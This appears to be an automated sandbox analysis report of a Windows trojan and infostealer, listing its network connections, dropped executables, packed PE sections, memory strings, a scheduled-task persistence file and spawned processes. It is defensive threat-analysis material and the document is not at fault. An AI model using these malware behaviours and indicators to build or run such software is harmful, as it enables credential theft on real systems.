Source: firefox.exe, 0000001B.00000002.1965127477.000002034F64F000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.1973462429.0000013C6029F000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2121556768.000001C956FC9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd--no-default-browser
Source: firefox.exe, 0000001D.00000002.2148441089.000001C966B4A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2123319128.000001C958BDA000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2123319128.000001C958B00000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdMOZ_CRASHREPORTER_RE
Source: unknown Network traffic detected: HTTP traffic on port 50145 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50036 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49981
Source: unknown Network traffic detected: HTTP traffic on port 50139 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50058
Source: unknown Network traffic detected: HTTP traffic on port 50059 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50094 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50059
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50061
Source: unknown Network traffic detected: HTTP traffic on port 50071 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50060
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50063
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50105
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50108
Source: unknown Network traffic detected: HTTP traffic on port 49996 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50107
Source: unknown Network traffic detected: HTTP traffic on port 50060 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50109
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50065
Source: unknown Network traffic detected: HTTP traffic on port 50018 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50064
Source: unknown Network traffic detected: HTTP traffic on port 50091 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50113 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50066
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50069
Source: unknown Network traffic detected: HTTP traffic on port 50077 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50104
Source: unknown Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50103
Source: unknown Network traffic detected: HTTP traffic on port 50107 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50072
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50071
Source: unknown Network traffic detected: HTTP traffic on port 49981 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50073
Source: unknown Network traffic detected: HTTP traffic on port 50080 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50118
Source: unknown Network traffic detected: HTTP traffic on port 50009 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50034 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50075
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50078
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50077
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50110
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50113
Source: unknown Network traffic detected: HTTP traffic on port 50108 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50073 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50080
Source: unknown Network traffic detected: HTTP traffic on port 50028 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50031 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50012 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50009
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50008
Source: unknown Network traffic detected: HTTP traffic on port 50142 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50087
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50000
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50005
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50090
Source: unknown Network traffic detected: HTTP traffic on port 50051 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50091
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50094
Source: unknown Network traffic detected: HTTP traffic on port 50023 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50065 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50105 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50018
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50139
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50017
Source: unknown Network traffic detected: HTTP traffic on port 50061 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50017 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50012
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50011
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50014
Source: unknown Network traffic detected: HTTP traffic on port 50090 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50016
Source: unknown Network traffic detected: HTTP traffic on port 50078 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50049 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50026 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50075 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50052 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown Network traffic detected: HTTP traffic on port 50087 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50028
Source: unknown Network traffic detected: HTTP traffic on port 50144 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50064 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown Network traffic detected: HTTP traffic on port 50008 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50014 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50021
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50142
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50023
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50144
Source: unknown Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50146
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50024
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50145
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50027
Source: unknown Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50026
Source: unknown Network traffic detected: HTTP traffic on port 50000 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50021 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50103 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49800
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown Network traffic detected: HTTP traffic on port 50038 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50063 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50011 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50118 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50031
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50034
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50036
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50038
Source: unknown Network traffic detected: HTTP traffic on port 50110 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50005 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50024 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50066 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50104 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49996
Source: unknown Network traffic detected: HTTP traffic on port 50016 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50146 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50058 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50049
Source: unknown Network traffic detected: HTTP traffic on port 50109 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50072 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50027 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50052
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50051
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown Network traffic detected: HTTP traffic on port 50069 -> 443
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.7:49746 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.7:49757 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.7:49763 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.7:49771 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.7:49780 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.7:49788 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.7:49800 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.7:49813 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.7:49830 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.7:49981 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.7:49996 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.7:50000 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.7:50005 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.7:50008 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.7:50012 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.7:50017 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.7:50024 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.7:50026 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.7:50028 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.7:50034 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.7:50036 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.7:50038 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.7:50049 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.7:50051 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.7:50052 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.7:50058 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.7:50066 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.7:50065 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.7:50077 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.7:50075 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.7:50069 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.7:50087 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.7:50090 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.7:50091 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.7:50094 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.7:50109 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.7:50110 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.7:50113 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.7:50139 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.7:50144 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.7:50145 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.7:50146 version: TLS 1.2

System Summary
barindex
Binary is likely a compiled AutoIt script file
Source: 136916b3ff.exe, 0000000F.00000002.1996242810.0000000000A12000.00000002.00000001.01000000.00000011.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_969886b5-e
Source: 136916b3ff.exe, 0000000F.00000002.1996242810.0000000000A12000.00000002.00000001.01000000.00000011.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_358705c8-7
PE file contains section with special chars
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .rsrc
Source: file.exe Static PE information: section name: .idata
Source: 3BW8PCDTI0L77ZRRJ1.exe.0.dr Static PE information: section name:
Source: 3BW8PCDTI0L77ZRRJ1.exe.0.dr Static PE information: section name: .idata
Source: G4X9C8XP66LPZY0PX2HHB5N.exe.0.dr Static PE information: section name:
Source: G4X9C8XP66LPZY0PX2HHB5N.exe.0.dr Static PE information: section name: .idata
Source: G4X9C8XP66LPZY0PX2HHB5N.exe.0.dr Static PE information: section name:
Source: J2IWSCR5FJAMGGW2VC4ET4.exe.0.dr Static PE information: section name:
Source: J2IWSCR5FJAMGGW2VC4ET4.exe.0.dr Static PE information: section name: .rsrc
Source: J2IWSCR5FJAMGGW2VC4ET4.exe.0.dr Static PE information: section name: .idata
Source: J2IWSCR5FJAMGGW2VC4ET4.exe.0.dr Static PE information: section name:
Source: skotes.exe.3.dr Static PE information: section name:
Source: skotes.exe.3.dr Static PE information: section name: .idata
Source: skotes.exe.3.dr Static PE information: section name:
Source: random[1].exe.7.dr Static PE information: section name:
Source: random[1].exe.7.dr Static PE information: section name: .rsrc
Source: random[1].exe.7.dr Static PE information: section name: .idata
Source: 8138ba21a1.exe.7.dr Static PE information: section name:
Source: 8138ba21a1.exe.7.dr Static PE information: section name: .rsrc
Source: 8138ba21a1.exe.7.dr Static PE information: section name: .idata
Source: random[1].exe0.7.dr Static PE information: section name:
Source: random[1].exe0.7.dr Static PE information: section name: .rsrc
Source: random[1].exe0.7.dr Static PE information: section name: .idata
Source: random[1].exe0.7.dr Static PE information: section name:
Source: bd214fbd32.exe.7.dr Static PE information: section name:
Source: bd214fbd32.exe.7.dr Static PE information: section name: .rsrc
Source: bd214fbd32.exe.7.dr Static PE information: section name: .idata
Source: bd214fbd32.exe.7.dr Static PE information: section name:
Source: 5VHE3T5UQF0Q17ZEPUURN3ZOS.exe.18.dr Static PE information: section name:
Source: 5VHE3T5UQF0Q17ZEPUURN3ZOS.exe.18.dr Static PE information: section name: .idata
Source: 5VHE3T5UQF0Q17ZEPUURN3ZOS.exe.18.dr Static PE information: section name:
Source: H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe.18.dr Static PE information: section name:
Source: H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe.18.dr Static PE information: section name: .rsrc
Source: H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe.18.dr Static PE information: section name: .idata
Source: H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe.18.dr Static PE information: section name:
PE file has a writeable .text section
Source: num.exe.7.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: num[1].exe.7.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Creates files inside the system directory
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Code function: 6_2_00425823 6_2_00425823
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Code function: 6_2_00425C4D 6_2_00425C4D
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\num[1].exe 27E4A3627D7DF2B22189DD4BEBC559AE1986D49A8F4E35980B428FADB66CF23D
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe Static PE information: Section: ZLIB complexity 0.9994520936468647
Source: G4X9C8XP66LPZY0PX2HHB5N.exe.0.dr Static PE information: Section: ZLIB complexity 0.9982384621934605
Source: G4X9C8XP66LPZY0PX2HHB5N.exe.0.dr Static PE information: Section: iropgfss ZLIB complexity 0.9943036808076225
Source: J2IWSCR5FJAMGGW2VC4ET4.exe.0.dr Static PE information: Section: fzxkvimr ZLIB complexity 0.9951563407902382
Source: skotes.exe.3.dr Static PE information: Section: ZLIB complexity 0.9982384621934605
Source: skotes.exe.3.dr Static PE information: Section: iropgfss ZLIB complexity 0.9943036808076225
Source: random[1].exe.7.dr Static PE information: Section: ZLIB complexity 0.9994520936468647
Source: 8138ba21a1.exe.7.dr Static PE information: Section: ZLIB complexity 0.9994520936468647
Source: random[1].exe0.7.dr Static PE information: Section: fzxkvimr ZLIB complexity 0.9951563407902382
Source: bd214fbd32.exe.7.dr Static PE information: Section: fzxkvimr ZLIB complexity 0.9951563407902382
Source: 5VHE3T5UQF0Q17ZEPUURN3ZOS.exe.18.dr Static PE information: Section: ZLIB complexity 0.9982384621934605
Source: 5VHE3T5UQF0Q17ZEPUURN3ZOS.exe.18.dr Static PE information: Section: iropgfss ZLIB complexity 0.9943036808076225
Source: H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe.18.dr Static PE information: Section: fzxkvimr ZLIB complexity 0.9951563407902382
Source: bd214fbd32.exe.7.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe.18.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: random[1].exe0.7.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: J2IWSCR5FJAMGGW2VC4ET4.exe.0.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: J2IWSCR5FJAMGGW2VC4ET4.exe, 00000004.00000003.1600676886.0000000004E50000.00000004.00001000.00020000.00000000.sdmp, J2IWSCR5FJAMGGW2VC4ET4.exe, 00000004.00000002.1688670034.0000000000471000.00000040.00000001.01000000.00000007.sdmp, bd214fbd32.exe, 0000000E.00000003.1883606041.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, bd214fbd32.exe, 0000000E.00000002.1923946896.0000000000051000.00000040.00000001.01000000.00000010.sdmp, num.exe, 00000026.00000002.2204943737.000000000037E000.00000002.00000001.01000000.00000014.sdmp Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@73/21@82/12
Source: C:\Users\user\AppData\Local\Temp\J2IWSCR5FJAMGGW2VC4ET4.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\36DBWZHB.htm Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5896:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7880:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7792:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1240:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3700:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1228:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5064:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4796:64:WilError_03
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user~1\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: file.exe, 00000000.00000003.1446054552.00000000059CB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1431607934.00000000059B7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1446144282.00000000059C1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1432027531.0000000005999000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1431730417.000000000599A000.00000004.00000800.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1999933119.00000000059B9000.00000004.00000800.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1999097778.00000000059D6000.00000004.00000800.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2023781336.00000000059CA000.00000004.00000800.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1999413840.00000000059BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe Virustotal: Detection: 52%
Source: G4X9C8XP66LPZY0PX2HHB5N.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: J2IWSCR5FJAMGGW2VC4ET4.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe "C:\Users\user~1\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\J2IWSCR5FJAMGGW2VC4ET4.exe "C:\Users\user~1\AppData\Local\Temp\J2IWSCR5FJAMGGW2VC4ET4.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user~1\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe "C:\Users\user~1\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe"
